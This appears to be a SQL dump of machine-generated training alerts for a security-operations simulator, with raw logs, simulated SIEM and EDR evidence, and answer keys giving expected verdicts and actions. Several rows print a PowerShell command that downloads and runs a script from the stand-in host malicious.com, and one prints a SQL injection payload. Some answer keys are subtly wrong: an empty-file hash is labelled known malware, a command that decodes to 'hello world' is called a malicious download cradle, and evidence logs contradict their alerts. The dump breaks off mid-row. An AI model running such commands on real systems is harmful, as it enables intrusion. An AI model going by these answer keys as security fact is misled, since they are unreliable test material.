(1695, 'Malware Command Execution Detected', 'critical', 'Wazuh', 'A potentially malicious command was executed on a host, indicating possible malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.100\",\"username\":\"malicious_user\",\"hostname\":\"infected_host\",\"request_body\":null,\"command_line\":\"powershell.exe -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\"\"}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to download and execute a remote script, typical of malware activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.com/script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command execution is a known technique for downloading and executing malware.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.998Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:45:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.100\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"infected_host\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"powershell.exe -nop -c \\\\\\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.com/script.ps1\')\\\\\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1696, 'Process Hollowing Detected in explorer.exe', 'critical', 'CrowdStrike', 'Suspicious activity detected where explorer.exe is exhibiting process hollowing behavior. Anomalous process injection identified.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"C:\\\\Windows\\\\explorer.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected in explorer.exe\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a common malware technique used to hide malicious code. The hash and behavior indicate a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1697, 'PowerShell Download Cradle Detected', 'high', 'Sysmon', 'A PowerShell script was executed with an encoded command, indicating a potential download cradle attack.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.5\",\"username\":\"asmith\",\"hostname\":\"finance-pc\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands suggests an attempt to obfuscate a download cradle attack, confirming the positive.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.011Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.5\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"finance-pc\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1698, 'Malicious Network Connection from Internal IP', 'medium', 'Carbon Black', 'An internal machine made a suspicious outbound connection to a known malicious IP address.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:21:15Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.0.2.45\",\"username\":\"tblack\",\"hostname\":\"server02\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for hosting command and control infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP indicates possible data exfiltration, justifying the positive verdict.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.019Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:21:15Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.0.2.45\\\",\\\"username\\\":\\\"tblack\\\",\\\"hostname\\\":\\\"server02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1699, 'Failed Login Attempts from Foreign IP', 'medium', 'SentinelOne', 'Multiple failed login attempts detected from an IP address located in a foreign country. Possible credential brute force attack.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:54:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server\",\"failed_attempts\":17}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for frequent brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common target username for brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and origin of failed login attempts suggest a brute force attack, supporting the positive classification.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:57:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:56:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:55:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"},{\"timestamp\":\"2026-03-15T20:54:16.026Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:54:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.85\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":17}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1700, 'Unexpected Internal Traffic Detected', 'low', 'Sysmon', 'Unusual internal network traffic detected, originating from an internal IP, but no malicious activity confirmed.', 'Lateral Movement', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.50\",\"username\":\"jdoe\",\"hostname\":\"workstation03\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network communication\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network communication\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic was between internal IPs and consistent with routine activity, confirming it as a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.029Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.45\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1701, 'Suspicious Encoded PowerShell Execution', 'medium', 'CrowdStrike', 'An encoded PowerShell command was executed, but further analysis indicated it was a legitimate administrative script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"198.51.100.10\",\"username\":\"admin\",\"hostname\":\"admin-pc\",\"command_line\":\"powershell.exe -EncodedCommand U29tZSBBZG1pbmlzdHJhdGl2ZSBTY3JpcHQ=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand U29tZSBBZG1pbmlzdHJhdGl2ZSBTY3JpcHQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command verified as legitimate administrative task\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was a legitimate administrative operation, hence categorized as a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1702, 'SQL Injection Attempt Detected on Web Server', 'high', 'Carbon Black', 'Detected SQL injection attempt on the company\'s web server. Malicious payload targeting database vulnerabilities.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.20\",\"dst_ip\":\"192.168.1.100\",\"username\":\"webuser\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected in URL parameters\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for malicious web activity\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload matches a classic SQL injection attempt, confirming the threat as a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, 